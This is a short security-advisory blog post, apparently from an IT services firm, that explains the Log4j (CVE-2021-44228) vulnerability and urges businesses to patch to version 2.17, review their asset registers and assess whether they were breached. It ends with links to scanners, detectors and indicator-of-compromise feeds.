Log4j - Has your business been affected? What next?
CVE-2021-44228, the prolific Log4j vulnerability has hit mainstream news and rightly so. From a board level the NCSC has issued some great guidance here on what steps executive teams should be doing.
The vulnerability itself is somewhat trivial to compromise and extremely prevalent. Log4j has been used in a significant number of commercial products as well as in-house systems across thousands of enterprises. The vulnerability allows an attacker to send a specially crafted log message to execute arbitrary code on your systems. This could result in ransomware, cryptominers, data exfiltration and a plethora of other major issues.
To add flame to the fire, organisations that have patched to the recommended versions in the original vulnerability may still not be full protected against other, albeit less severe issues. We therefore recommend reviewing your assets further and ensuring where possible you are fully patched to version 2.17 of Log4j or have taken other mitigation steps.
Unfortunately we're still encountering a lot of businesses that fall into the categories of:
- Believing they aren't affected without carrying out any kind of assessment/review
- Weren't aware of the original or subsequent issues.
- Have incomplete asset registers and have missed critical, vulnerable devices and services.
If the above applies to you, then we strongly recommend discussing with your IT team or Managed Service Provider about fully testing and remediating your environment, and potentially undertaking activities that assume that you have been breached.
Once again this issue highlights the need for comprehensive asset management to allow for rapid remediation. We've been assisting businesses with this process throughout, but the time to ensure you have an updated and comprehensive asset register is never in the middle of an incident.
Useful Links
- CISA have collated a list of known affected vendors here
- Thinkst Canary have released a free CanaryToken that can trigger an alert when inserted into vulnerable inputs
- The CERT Coordination Center have made their scanner publicly available
- There's a Burp extension to assist with scanning (by browsing your sites in Burp)
- We've found this Log4Shell detector to be efficient at reviewing logs
- GreyNoise is providing IOCs for CVE-2021-44228 Apache Log4j RCE attempts on Github. You can access the C2/Callback domains here and the latest IPs here.
If you need further assistance, or aren't sure what the next steps should be for your business, then please get in touch